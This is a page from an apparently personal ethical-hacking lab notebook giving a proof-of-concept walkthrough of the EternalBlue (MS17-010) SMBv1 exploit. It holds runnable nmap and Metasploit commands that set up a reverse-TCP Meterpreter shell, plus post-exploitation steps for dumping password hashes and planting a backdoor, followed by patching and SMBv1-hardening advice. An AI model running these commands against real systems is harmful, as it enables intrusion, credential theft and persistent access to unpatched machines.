Funmibi's Organization
  • NOTES
  • Ethical Hacking Lab Setup Guide
  • Information Gathering & Reconnaissance
  • Social Engineering Attack Report
  • Hash Cracking
  • ChatGPT for Cybersecurity
  • Google Hacking (Google Dorking)
  • Nmap Port Scanning & Vulnerability Assessment
  • Proof-of-Concept Exploit: EternalBlue (MS17-010)
  • Privilege Escalation & Client-Side Exploits
  • Buffer Overflow Vulnerability
  • Windows-Based Buffer Overflow Attack
  • Man-in-the-Middle (MITM) Attack
  • BeEF (Browser Exploitation Framework) Setup & Demonstration
Powered by GitBook
On this page
  • 1. Introduction
  • 2. Vulnerability Background
  • How It Works
  • 3. Setting Up the Exploit (Kali Linux + Metasploit)
  • Step 1: Identify a Vulnerable Target
  • Step 2: Launch the EternalBlue Exploit in Metasploit
  • 4. Post-Exploitation
  • 5. Mitigation & Prevention
  • Microsoft’s Patch
  • Disable SMBv1
  • Network Security Best Practices
  • 6. Ethical Considerations

Proof-of-Concept Exploit: EternalBlue (MS17-010)

1. Introduction

EternalBlue (MS17-010) is a critical Windows SMBv1 vulnerability discovered in 2017. It was exploited by the WannaCry ransomware and other malware attacks. This Proof-of-Concept (PoC) demonstrates how the exploit works for educational and ethical testing purposes only.

2. Vulnerability Background

  • CVE ID: CVE-2017-0144

  • Affected Systems:

    • Windows XP, Windows 7, Windows 8.1, Windows Server 2003, 2008, 2012

  • Vulnerable Service: SMBv1 (Server Message Block Protocol)

  • Exploit Type: Remote Code Execution (RCE)

  • Impact: Allows an attacker to execute arbitrary code remotely without authentication.

How It Works

  • EternalBlue exploits a flaw in how SMBv1 handles specially crafted packets.

  • The vulnerability allows an attacker to execute code at SYSTEM level privileges, gaining full control of the target machine.

  • Microsoft patched this vulnerability in March 2017 with security update MS17-010.

3. Setting Up the Exploit (Kali Linux + Metasploit)

Step 1: Identify a Vulnerable Target

Scan the network for SMB vulnerabilities:

nmap -p445 --script=smb-vuln-ms17-010 192.168.1.0/24

If the scan returns "VULNERABLE", the target is exploitable.

Step 2: Launch the EternalBlue Exploit in Metasploit

Open Metasploit:

msfconsole

Select the EternalBlue module:

use exploit/windows/smb/ms17_010_eternalblue

Set target details:

set RHOSTS 192.168.1.100  # Replace with target IP
set LHOST 192.168.1.50    # Replace with attacker's IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Run the exploit:

exploit

Note: If successful, a Meterpreter session is opened, granting full control over the target.

4. Post-Exploitation

After gaining access, an attacker can:

  • List system information: sysinfo

  • Capture screenshots: screenshot

  • Dump passwords: hashdump

  • Enable a persistent backdoor

5. Mitigation & Prevention

Microsoft’s Patch

  • Apply MS17-010 update from Windows Update.

Disable SMBv1

Run the following PowerShell command to disable SMBv1:

Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

Network Security Best Practices

  • Use firewalls to block port 445 (SMB traffic) from untrusted sources.

  • Deploy endpoint security tools to detect SMB exploits.

  • Monitor network traffic for unusual SMB activity.

6. Ethical Considerations

  • Unauthorized exploitation is illegal. Always obtain explicit permission before testing systems.

PreviousNmap Port Scanning & Vulnerability AssessmentNextPrivilege Escalation & Client-Side Exploits